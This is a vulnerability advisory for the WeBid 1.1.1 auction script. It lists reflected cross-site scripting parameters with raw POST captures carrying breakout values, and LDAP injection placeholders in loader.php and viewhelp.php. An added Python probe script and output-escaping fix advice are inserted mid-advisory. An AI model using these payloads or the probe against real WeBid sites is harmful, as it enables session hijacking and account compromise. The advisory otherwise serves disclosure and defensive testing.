##################################################################################################
#
# Exploit Title : WeBid Version 1.1.1 multiple vulnerabilities
# Author        : Govind Singh aka NullPort
# Vendor        : http://www.webidsupport.com/
# Download Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
# Google Dork   : "Powered by WeBid"
# Date          : 11/07/2014
# Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
# Love to       : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina, Jitender Dangi
# Greez to      : All IHT Members
#
###################################################################################################

1. Reflected Cross-Site Scripting
2. LDAP Injection

==================================================================================================================

1. Reflected Cross-Site Scripting

1. http://localhost/WeBid/register.php

Reflected Cross-Site Scripting in the following parameters:
"TPL_name"
"TPL_nick"
"TPL_email"
"TPL_year"
"TPL_address"
"TPL_city"
"TPL_prov"
"TPL_zip"
"TPL_phone"
"TPL_pp_email"
"TPL_authnet_id"
"TPL_authnet_pass"
"TPL_worldpay_id"
"TPL_toocheckout_id"
"TPL_moneybookers_email"

PoC : the XSS payload can be submitted in any of these parameters; each value is written back into the registration form without HTML encoding.

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name=">&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
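The request above probes a single parameter by hand. As an added example (this is not code from the advisory or from WeBid), the script below builds one register.php probe body per reported TPL_* parameter from the captured POST (keeping its empty csrftoken and the other fixed fields), puts an attribute-breakout canary in that parameter, and classifies how a response echoes it: verbatim (the breakout works), HTML-escaped (safe), or not at all. Because it must run offline, the two render functions are constructed stand-ins for the WeBid template, one echoing the raw value as the advisory reports and one escaping it; against a live target the same classifier is applied to the real response body, and it serves the user_login.php "username" parameter in the same way.

```python
"""Added example, not code from the WeBid advisory or from WeBid itself.

Builds register.php probe bodies from the captured request and classifies
how a response echoes a canary: verbatim (exploitable attribute breakout),
HTML-escaped (safe), or absent. The render functions are constructed
stand-ins for the WeBid template; nothing here talks to a server.
"""
import html
from urllib.parse import urlencode

# Parameters the advisory reports as reflected in register.php.
REGISTER_PARAMS = [
    "TPL_name", "TPL_nick", "TPL_email", "TPL_year", "TPL_address",
    "TPL_city", "TPL_prov", "TPL_zip", "TPL_phone", "TPL_pp_email",
    "TPL_authnet_id", "TPL_authnet_pass", "TPL_worldpay_id",
    "TPL_toocheckout_id", "TPL_moneybookers_email",
]

# Remaining fields from the captured POST, with the values it carried.
BASELINE_FIELDS = {
    "csrftoken": "", "TPL_password": "", "TPL_repeat_password": "",
    "TPL_day": "", "TPL_month": "00", "TPL_country": "United Kingdom",
    "TPL_timezone": "0", "TPL_nletter": "1", "captcha_code": "",
    "action": "first",
}


def make_canary(param):
    """Close a double-quoted attribute, then open a tag unique to `param`.

    No script runs; a bare tag is enough to prove the breakout and lets
    each parameter be attributed when several are probed at once.
    """
    return f'"><xsstest_{param.lower()}>'


def build_register_body(param, canary):
    """x-www-form-urlencoded body for one probe: every field from the
    capture, with `canary` placed in `param` and the rest left empty."""
    fields = {"csrftoken": BASELINE_FIELDS["csrftoken"]}
    fields.update({p: "" for p in REGISTER_PARAMS})
    fields.update({k: v for k, v in BASELINE_FIELDS.items() if k != "csrftoken"})
    fields[param] = canary
    return urlencode(fields)


def classify_reflection(response_body, canary):
    """'unencoded' if the canary is echoed verbatim, 'encoded' if only its
    HTML-escaped form is present, otherwise 'absent'."""
    if canary in response_body:
        return "unencoded"
    if html.escape(canary, quote=True) in response_body:
        return "encoded"
    return "absent"


def vulnerable_render(param, value):
    """Constructed template that writes the submitted value straight into
    the input's value attribute, the behaviour the advisory reports."""
    return f'<input type="text" name="{param}" value="{value}">'


def hardened_render(param, value):
    """Same template with the value escaped the way PHP's
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8') escapes it."""
    return f'<input type="text" name="{param}" value="{html.escape(value, quote=True)}">'


def probe_all(render):
    """Probe each reported parameter through `render` and return
    {parameter: classification}. Against a live target, `render` is replaced
    by a function that POSTs build_register_body(param, canary) and returns
    the response body."""
    results = {}
    for param in REGISTER_PARAMS:
        canary = make_canary(param)
        results[param] = classify_reflection(render(param, canary), canary)
    return results


if __name__ == "__main__":
    print("vulnerable:", probe_all(vulnerable_render))
    print("hardened:  ", probe_all(hardened_render))
```

The server-side fix is what hardened_render imitates: pass every echoed TPL_* value through htmlspecialchars($value, ENT_QUOTES, 'UTF-8') before writing it into the template, so the closing quote and angle brackets of the canary arrive as &quot;, &lt; and &gt; and the attribute is never left.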
----------------------------------------------------------------------------------------------------------------

2. http://localhost/WeBid/user_login.php

Reflected Cross-Site Scripting in the following parameter:
"username"

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username=">&password=&input=Login&action=login

==================================================================================================================

2. LDAP Injection

PoC :
http://localhost/WeBid/loader.php?js=[LDAP]

(normal use of the parameter, for comparison: http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;)

PoC :
http://localhost/WeBid/viewhelp.php?cat=[LDAP]

(normal values of cat= are 1, 2, 3 and 4)

Note: [LDAP] marks where the injection payload goes; the advisory gives no concrete payload and no server response for either URL. Since js= normally carries a semicolon-separated list of script paths and cat= a numeric help category, confirm the application's actual behaviour with a concrete payload before treating these two items as exploitable.

----------------------------------------------------------------------------------------------------------------------